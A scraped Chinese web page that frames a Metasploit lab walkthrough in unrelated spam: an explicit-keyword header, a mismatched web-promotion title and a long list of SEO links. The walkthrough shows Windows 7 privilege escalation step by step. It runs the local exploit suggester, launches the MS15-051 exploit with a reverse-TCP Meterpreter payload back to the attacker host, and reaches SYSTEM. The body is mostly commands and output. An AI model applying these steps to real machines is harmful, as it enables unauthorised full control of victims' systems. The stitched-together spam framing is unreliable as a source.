中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

公司做網(wǎng)站推廣的價格鮮花網(wǎng)絡(luò)營銷推廣方案

公司做網(wǎng)站推廣的價格,鮮花網(wǎng)絡(luò)營銷推廣方案,中國交通建設(shè)官方網(wǎng)站,如何把自己做的網(wǎng)站放到www本文章僅用于信息安全學(xué)習(xí),請遵守相關(guān)法律法規(guī),嚴(yán)禁用于非法途徑。若讀者因此作出任何危害網(wǎng)絡(luò)安全的行為,后果自負(fù),與作者無關(guān)。 環(huán)境準(zhǔn)備: 名稱系統(tǒng)位數(shù)IP攻擊機Kali Linux6410.3.0.231客戶端Windows 76410.3.0.234…

本文章僅用于信息安全學(xué)習(xí),請遵守相關(guān)法律法規(guī),嚴(yán)禁用于非法途徑。若讀者因此作出任何危害網(wǎng)絡(luò)安全的行為,后果自負(fù),與作者無關(guān)。

環(huán)境準(zhǔn)備:

名稱系統(tǒng)位數(shù)IP
攻擊機Kali Linux6410.3.0.231
客戶端Windows 76410.3.0.234

當(dāng)我們通過MSF成功登錄靶機時,進行提權(quán)時如果報如下,表示沒有拿到系統(tǒng)權(quán)限

meterpreter > getsystem# 輸出
[-] priv_elevate_getsystem: Operation failed: 1726 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

接下我們演示如何進入提權(quán):

1、切換?msf

meterpreter > bg# 輸出
[*] Backgrounding session 2...

2、使用本地漏洞模塊

# 用這個模塊快速識別系統(tǒng)中可能被利用的漏洞
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester# 輸出
msf6 post(multi/recon/local_exploit_suggester) > 

3、設(shè)置 Session

# session 值通過 sessions -l 查看
msf6 post(multi/recon/local_exploit_suggester) > set session 2# 輸出
session => 2

4、運行

msf6 post(multi/recon/local_exploit_suggester) > run# 輸出[*] 10.3.0.234 - Collecting local exploits for x64/windows...
[*] 10.3.0.234 - 186 exploit checks are being tried...
[+] 10.3.0.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.3.0.234 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated.
[+] 10.3.0.234 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 43 / 43
[*] 10.3.0.234 - Valid modules for session 2:
============================#   Name                                                           Potentially Vulnerable?  Check Result-   ----                                                           -----------------------  ------------1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.4   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!6   exploit/windows/local/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.7   exploit/windows/local/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!8   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.9   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.10  exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.11  exploit/windows/local/ms15_078_atmfd_bof                       Yes                      The service is running, but could not be validated.12  exploit/windows/local/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.13  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.14  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.15  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.16  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.17  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.18  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.19  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found20  exploit/windows/local/capcom_sys_exec                          No                       The target is not exploitable.21  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.22  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.23  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.24  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.25  exploit/windows/local/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!26  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.27  exploit/windows/local/cve_2022_21882_win32k                    No                       The target is not exploitable.28  exploit/windows/local/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.29  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.30  exploit/windows/local/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H231  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found32  exploit/windows/local/ikeext_service                           No                       The check raised an exception.33  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store34  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.35  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.37  exploit/windows/local/nvidia_nvsvc                             No                       The check raised an exception.38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found40  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.41  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.42  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.43  exploit/windows/local/webexec                                  No                       The check raised an exception

5、我們找到一個漏洞,注意:這里不是每個漏洞都可以成功,要多試幾個

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image# 輸出
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

6、查看這個模塊的選項,這里有個注意點,因為我的靶機是 win7 64位系統(tǒng),所以你通過msfvenom 生成的木馬也要是64位,這里的 tartget 也要是64位的,如果不是,通過 set target 進行設(shè)置

msf6 exploit(windows/local/ms15_051_client_copy_image) > optionsModule options (exploit/windows/local/ms15_051_client_copy_image):Name     Current Setting  Required  Description----     ---------------  --------  -----------SESSION  2                yes       The session to run this module onPayload options (windows/x64/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     10.3.0.231       yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen port# 這里的 tartget 也要是64位的
Exploit target:Id  Name--  ----1   Windows x64

7、再次進行滲透,成功出現(xiàn)meterpreter ,代表成功

msf6 exploit(windows/local/ms15_051_client_copy_image) > run# 輸出
[*] Started reverse TCP handler on 10.3.0.231:4444 
[*] Reflectively injecting the exploit DLL and executing it...
[*] Launching netsh to host the DLL...
[+] Process 3804 launched.
[*] Reflectively injecting the DLL into 3804...
[*] Sending stage (200774 bytes) to 10.3.0.234
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 4 opened (10.3.0.231:4444 -> 10.3.0.234:52882) at 2024-03-15 11:47:15 +0800meterpreter > 

8、 查看權(quán)限

meterpreter > getuid# 成功提權(quán)
Server username: NT AUTHORITY\SYSTEM

9、再次查看 sessions

msf6 exploit(windows/local/ms15_051_client_copy_image) > sessions -l# 我們發(fā)現(xiàn)也多了一個
Active sessions
===============Id  Name  Type                     Information                     Connection--  ----  ----                     -----------                     ----------2         meterpreter x64/windows  tomma-PC\tomma @ TOMMA-PC       10.3.0.231:9999 -> 10.3.0.234:52740 (10.3.0.234)4         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TOMMA-PC  10.3.0.231:4444 -> 10.3.0.234:52882 (10.3.0.234)

?

http://www.risenshineclean.com/news/50477.html

相關(guān)文章:

  • 做優(yōu)化網(wǎng)站哪個公司好win10優(yōu)化大師是官方的嗎
  • 啟東做網(wǎng)站的網(wǎng)絡(luò)公司有哪些外貿(mào)網(wǎng)絡(luò)營銷推廣
  • 做阿里巴巴網(wǎng)站圖片尺寸枸櫞酸西地那非片的功效與作用
  • 通過網(wǎng)站如何做海外貿(mào)易大連seo按天付費
  • 如何在門戶網(wǎng)站做搜索引擎廈門網(wǎng)站建設(shè)公司
  • 響應(yīng)式網(wǎng)站介紹東莞網(wǎng)絡(luò)排名優(yōu)化
  • 做網(wǎng)站一定要學(xué)java嗎寫軟文平臺
  • php 網(wǎng)站 模板無錫百度競價公司
  • 代刷網(wǎng)站推廣鏈接快手百度賬號申請注冊
  • 局域網(wǎng)網(wǎng)站開發(fā)軟件seo優(yōu)化有哪些
  • 東莞公司網(wǎng)站建設(shè)公司河南網(wǎng)站顧問
  • 做網(wǎng)站站主需要什么條件天津提升專業(yè)關(guān)鍵詞排名
  • 上海做征信服務(wù)的公司網(wǎng)站愛網(wǎng)站關(guān)鍵詞查詢工具長尾
  • 企業(yè)門戶網(wǎng)站作用腰椎間盤突出壓迫神經(jīng)腿疼怎么治
  • 怎樣做天貓網(wǎng)站視頻公司網(wǎng)站建設(shè)代理
  • 珠海哪里做網(wǎng)站的網(wǎng)絡(luò)怎么做推廣
  • 桂林 網(wǎng)站 建設(shè)海南網(wǎng)站制作
  • 淄博周村網(wǎng)站建設(shè)公司廣州優(yōu)化公司哪家好
  • 視頻網(wǎng)站做短視頻百度推廣一個關(guān)鍵詞多少錢
  • wordpress 微博主題 twitter主題seo建站要求
  • 2018網(wǎng)站開發(fā)最流行的語言產(chǎn)品推廣網(wǎng)站哪個好
  • 杭州政府網(wǎng)站建設(shè)管理seo查詢系統(tǒng)源碼
  • 易語言怎么制作網(wǎng)站網(wǎng)上銷售平臺
  • 鄧州微網(wǎng)站開發(fā)seo標(biāo)題優(yōu)化是什么意思
  • 公司網(wǎng)站設(shè)計的企業(yè)西安百度網(wǎng)站排名優(yōu)化
  • 中國三大門戶網(wǎng)站是哪三個開源cms建站系統(tǒng)
  • 關(guān)于配色的網(wǎng)站千鋒教育靠譜嗎
  • 黃岡最專業(yè)的公司網(wǎng)站建設(shè)平臺西安百度seo代理
  • wordpress做一個視頻網(wǎng)站嗎刷網(wǎng)站排名軟件
  • 在線做網(wǎng)站索引線下營銷推廣方式都有哪些